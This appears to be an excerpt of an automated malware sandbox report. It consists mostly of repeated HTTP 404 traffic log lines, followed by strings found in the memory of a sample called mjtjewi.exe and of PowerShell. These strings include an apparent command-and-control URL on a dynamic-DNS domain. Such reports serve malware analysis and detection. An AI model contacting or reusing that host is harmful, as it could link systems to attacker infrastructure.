Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:46 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:51 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:57 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:35 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:36 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:37 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:38 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:39 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:40 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:41 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:42 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:43 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:22:44 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mjtjewi.exe, 00000005.00000002.2638412976.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
Source: mjtjewi.exe, 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.phpy
Source: powershell.exe, 00000000.00000002.1507180884.0000020C63C17000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.coF
Source: powershell.exe, 00000000.00000002.1499571714.0000020C5BA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1499571714.0000020C5B93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1464066335.0000020C4CFC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
